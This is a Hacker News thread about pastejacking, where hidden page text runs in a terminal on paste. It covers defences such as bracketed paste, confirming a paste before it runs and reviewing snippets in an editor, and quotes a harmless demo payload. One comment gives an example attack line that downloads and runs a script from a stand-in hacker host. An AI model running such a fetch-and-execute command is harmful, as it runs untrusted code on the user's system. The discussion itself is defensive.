
Look before you paste from a website to terminal - marcinkuzminski
http://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
======
teh_klev
This sort of _attack_ has been discussed in great detail previously:

[https://news.ycombinator.com/item?id=10554679](https://news.ycombinator.com/item?id=10554679)

[https://news.ycombinator.com/item?id=5508225](https://news.ycombinator.com/item?id=5508225)

[http://thejh.net/misc/website-terminal-copy-
paste](http://thejh.net/misc/website-terminal-copy-paste)

------
M4v3R
Not sure if this is iTerm2 or zsh, but I have to confirm the code I am pasting
by pressing enter, which gives me an opportunity to review it first. I like
this feature a lot.

~~~
mdrzn
Not always, sometimes when I copy something and paste it with Ctrl+V (insted
of Ctrl+Shift+V) it still get pasted+entered.

~~~
joenot443
This could be incorrect, but could it be because there's a newline character
copied as well which gets translated into an Enter?

~~~
mdrzn
It surely could be, but that bypass M4v3R's opportunity to review the code.

This problem appears to me on iTerm2 build 2.1

------
annnnd
Even more interesting: given the plethora of options terminals have for
coloring, moving, erasing and similar, is it possible to hide malicious input
from the shell too so that the victim is unaware of it?

~~~
lima
Yep. There are a few demonstrations floating around.

------
martin-adams
Here's a question, could such an exploit be achieved using something like
Stack Overflow?

~~~
dspillett
Probably not due to the limited markup options available.

It would almost certainly be possible form a great many similar forums and
bulletin-board like sites though.

~~~
Klathmon
Could you get away with a more limited version by abusing Unicode?

With so many "unprintables" combined with things like the RTL and LTR control
characters I think it would be possible on some level.

------
stymaar
What I usually do since I've been shown this kind of attack :

\- Ctrl-X Ctrl-E: open the default text editor on your system

\- paste your snipet here and review it

\- save the snipet in your editor, it is now run.

------
godelski
In zsh I can paste (or paste) into the browser (FF) I get

ls ; clear; echo 'Haha! You gave me access to your computer with sudo!'; echo
-ne 'h4cking ## (10%)\r'; sleep 0.3; echo -ne 'h4cking ### (20%)\r'; sleep
0.3; echo -ne 'h4cking ##### (33%)\r'; sleep 0.3; echo -ne 'h4cking #######
(40%)\r'; sleep 0.3; echo -ne 'h4cking ########## (50%)\r'; sleep 0.3; echo
-ne 'h4cking ############# (66%)\r'; sleep 0.3; echo -ne 'h4cking
##################### (99%)\r'; sleep 0.3; echo -ne 'h4cking
####################### (100%)\r'; echo -ne '\n'; echo 'Hacking complete.';
echo 'Use GUI interface using visual basic to track my IP' ls -lat

Which seems like it would be pretty stupid for me to press enter. Which if
we're talking security it seems to more sane thing to do is not automatically
send commands that are pasted in. Zsh being secure and bash not. I feel this
is more a developer issue than user.

~~~
gumby
> Which seems like it would be pretty stupid for me to press enter. Which if
> we're talking security it seems to more sane thing to do is not
> automatically send commands that are pasted in. Zsh being secure and bash
> not. I feel this is more a developer issue than user.

A triple click selection will copy the whole line _including the newline_. So
a paste will execute it as well.

------
esseti
this should be explited by stack overflow to have a counter on which lines
were copied and how many times. With this counter one could know what's the
best answer used by many :)

------
Sean1708
Bracketed paste and a vaguely half-decent terminal emulator will prevent this.

------
sly010
I already paste everything longer than a single line to my non-terminal text
editor (e.g. sublime) before I paste it to my terminal or vim. Perhaps I
should start doing this for everything.

------
zupreme
This is a valid danger but the author goes a bit far with the sudo warning.
Unless you're logged in as root to most systems (in which case sudo likely
won't be needed to screw your system up) using sudo would result in a password
being requested which, I would hope, the user would see as a red flag,
especially if they are technical enough to be locating and testing script
snippets.

~~~
godelski
Except sudo has a 15 minute timeout. So there's a decent chance someone has
used sudo in that time.

~~~
geggam
when did ubuntu start shipping with password sudo ?

------
tyrylu
Probably worthless tip, try browsing that code snippet with a screen reader.
Yes, it is not hidden from that software. :-)

~~~
carlesfe
I feel that we are not exactly the target audience for this kind of tip. Linux
forums are full of code snippets that people blindly copy and paste so this is
clearly an extended behavior

In any case, most newbies wouldn't even understand whether a command is
malicious or not (e.g. `wget
[http://hax0r.com/exploit.sh;](http://hax0r.com/exploit.sh;) bash
exploit.sh`), but I wouldn't say the tip is worthless...

------
gigatexal
Has anyone been burned by this? I'm going to start pasting things into a
different text editor before running them.

~~~
stronglikedan
That's my go-to method. I use Notepad++ with "View -> Show Symbol -> Show All
Characters" turned on.

------
marcinkuzminski
Found another one here: [http://thejh.net/misc/website-terminal-copy-
paste](http://thejh.net/misc/website-terminal-copy-paste)

------
akerro
Pfff should have just put forkbomb there.

------
bjt2n3904
The "fix" to this problem is not to let your browser hook Ctrl+C. Mozilla, if
you're listening, could you perhaps make this an option? Or perhaps display a
notice if you notice JS hook on Ctrl+C?

~~~
chr1
The example in the article doesn't use javascript, and doesn't hook Ctrl-C,
all it uses is simple css.

The problem here is not related to the browsers at all, the problem is on the
terminal side, which should not immediately run and random text that was
pasted, but should allow editing the pasted text before running.

~~~
chaosfox
I am not sure the browser is free of blame here, getting invisible characters
copied together with the text I selected goes completely against my
expectations.

~~~
brod
this could be considered a handy feature in a different scenario, the browser
shouldn't be responsible for checking if the text you copied was visible.

Just get a half decent terminal, many have precautions in place for
copy/paste.

